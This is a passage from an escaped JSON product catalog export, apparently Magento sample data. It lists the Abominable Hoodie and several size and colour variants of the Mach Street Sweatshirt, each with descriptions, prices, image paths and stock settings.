ail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"143\":{\"sku\":\"MH09\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Abominable Hoodie\",\"description\":\"<p>It took CoolTech&trade; weather apparel know-how and lots of wind-resistant fabric to get the Abominable Hoodie just right. It\'s aggressively warm when it needs to be, while maintaining your comfort in milder climes.<\\/p>\\n<p>&bull; Blue heather hoodie.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Moisture-wicking. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,material=CoolTech&trade;|Wool|Nylon,pattern=Solid,climate=Spring|Windy,eco_collection=No,performance_fabric=No,erin_recommends=Yes,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MH09-XS-Blue,size=XS,color=Blue|sku=MH09-XS-Green,size=XS,color=Green|sku=MH09-XS-Red,size=XS,color=Red|sku=MH09-S-Blue,size=S,color=Blue|sku=MH09-S-Green,size=S,color=Green|sku=MH09-S-Red,size=S,color=Red|sku=MH09-M-Blue,size=M,color=Blue|sku=MH09-M-Green,size=M,color=Green|sku=MH09-M-Red,size=M,color=Red|sku=MH09-L-Blue,size=L,color=Blue|sku=MH09-L-Green,size=L,color=Green|sku=MH09-L-Red,size=L,color=Red|sku=MH09-XL-Blue,size=XL,color=Blue|sku=MH09-XL-Green,size=XL,color=Green|sku=MH09-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh09-blue_alt1.jpg,\\/m\\/h\\/mh09-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh09-blue_alt1.jpg,\\/m\\/h\\/mh09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"material\":\"CoolTech&trade;|Wool|Nylon\",\"pattern\":\"Solid\",\"climate\":\"Spring|Windy\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"Yes\",\"new\":\"No\",\"sale\":\"No\"},\"144\":{\"sku\":\"MH10-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Mach Street Sweatshirt -XS-Black\",\"description\":\"<p>From hard streets to asphalt track, the Mach Street Sweatshirt holds up to wear and wind and rain. An infusion of performance and stylish comfort, with moisture-wicking LumaTech&trade; fabric, it\'s bound to become an everyday part of your active lifestyle<\\/p>\\n<p>&bull; Navy heather crewneck sweatshirt.<br \\/>&bull; LumaTech&trade; moisture-wicking fabric.<br \\/>&bull; Antimicrobial, odor-resistant.<br \\/>&bull; Zip hand pockets.<br \\/>&bull; Chafe-resistant flatlock seams.<br \\/>&bull; Rib-knit cuffs and hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"62\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mach-street-sweatshirt-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"145\":{\"sku\":\"MH10-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Mach Street Sweatshirt -XS-Blue\",\"description\":\"<p>From hard streets to asphalt track, the Mach Street Sweatshirt holds up to wear and wind and rain. An infusion of performance and stylish comfort, with moisture-wicking LumaTech&trade; fabric, it\'s bound to become an everyday part of your active lifestyle<\\/p>\\n<p>&bull; Navy heather crewneck sweatshirt.<br \\/>&bull; LumaTech&trade; moisture-wicking fabric.<br \\/>&bull; Antimicrobial, odor-resistant.<br \\/>&bull; Zip hand pockets.<br \\/>&bull; Chafe-resistant flatlock seams.<br \\/>&bull; Rib-knit cuffs and hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"62\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mach-street-sweatshirt-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh10-blue_alt1.jpg,\\/m\\/h\\/mh10-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh10-blue_alt1.jpg,\\/m\\/h\\/mh10-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"146\":{\"sku\":\"MH10-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Mach Street Sweatshirt -XS-Red\",\"description\":\"<p>From hard streets to asphalt track, the Mach Street Sweatshirt holds up to wear and wind and rain. An infusion of performance and stylish comfort, with moisture-wicking LumaTech&trade; fabric, it\'s bound to become an everyday part of your active lifestyle<\\/p>\\n<p>&bull; Navy heather crewneck sweatshirt.<br \\/>&bull; LumaTech&trade; moisture-wicking fabric.<br \\/>&bull; Antimicrobial, odor-resistant.<br \\/>&bull; Zip hand pockets.<br \\/>&bull; Chafe-resistant flatlock seams.<br \\/>&bull; Rib-knit cuffs and hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"62\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mach-street-sweatshirt-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"147\":{\"sku\":\"MH10-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Mach Street Sweatshirt -S-Black\",\"description\":\"<p>From hard streets to asphalt track, the Mach Street Sweatshirt holds up to wear and wind and rain. An infusion of performance and stylish comfort, with moisture-wicking LumaTech&trade; fabric, it\'s bound to become an everyday part of your active lifestyle<\\/p>\\n<p>&bull; Navy heather crewneck sweatshirt.<br \\/>&bull; LumaTech&trade; moisture-wicking fabric.<br \\/>&bull; Antimicrobial, odor-resistant.<br \\/>&bull; Zip hand pockets.<br \\/>&bull; Chafe-resistant flatlock seams.<br \\/>&bull; Rib-knit cuffs and hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"62\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mach-street-sweatshirt-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"148\":{\"sku\":\"MH10-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Mach Street Sweatshirt -S-Blue\",\"description\":\"<p>From hard streets to asphalt track, the Mach Street Sweatshirt holds up to wear and wind and rain. An infusion of performance and stylish comfort, with moisture-wicking LumaTech&trade; fabric, it\'s bound to become an everyday part of your active lifestyle<\\/p>\\n<p>&bull; Navy heather crewneck sweatshirt.<br \\/>&bull; LumaTech&trade; moisture-wicking fabric.<br \\/>&bull; Antimicrobial, odor-resistant.<br \\/>&bull; Zip hand pockets.<br \\/>&bull; Chafe-resistant flatlock seams.<br \\/>&bull; Rib-knit cuffs and hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"62\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mach-street-sweatshirt-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh10-blue_alt1.jpg,\\/m\\/h\\/mh10-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh10-blue_alt1.jpg,\\/m\\/h\\/mh10-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"149\":{\"sku\":\"MH10-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Mach Street Sweatshirt -S-Red\",\"description\":\"<p>From hard streets to asphalt track, the Mach Street Sweatshirt holds up to wear and wind and rain. An infusion of performance and stylish comfort, with moisture-wicking LumaTech&trade; fabric, it\'s bound to become an everyday part of your active lifestyle<\\/p>\\n<p>&bull; Navy heather crewneck sweatshirt.<br \\/>&bull; LumaTech&trade; moisture-wicking fabric.<br \\/>&bull; Antimicrobial, odor-resistant.<br \\/>&bull; Zip hand pockets.<br \\/>&bull; Chafe-resistant flatlock seams.<br \\/>&bull; Rib-knit cuffs and hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"62\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mach-street-sweatshirt-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"150\":{\"sku\":\"MH10-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Mach Street Sweatshirt -M-Black\",\"description\":\"<p>From hard streets to asphalt track, the Mach Street Sweatshirt holds up to wear and wind and rain. An infusion of performance and stylish comfort, with moisture-wicking LumaTech&trade; fabric, it\'s bound to become an everyday part of your active lifestyle<\\/p>\\n<p>&bull; Navy heather crewneck sweatshirt.<br \\/>&bull; LumaTech&trade; moisture-wicking fabric.<br \\/>&bull; Antimicrobial, odor-resistant.<br \\/>&bull; Zip hand pockets.<br \\/>&bull; Chafe-resistant flatlock seams.<br \\/>&bull; Rib-knit cuffs and hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"62\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mach-street-sweatshirt-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"151\":{\"sku\":\"MH10-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Mach Street Sweatshirt -M-Blue\",\"description\":\"<p>From hard streets to asphalt track, the Mach Street Sweatshirt holds up to wear and wind and rain. An infusion of performance and stylish comfort, with moisture-wicking 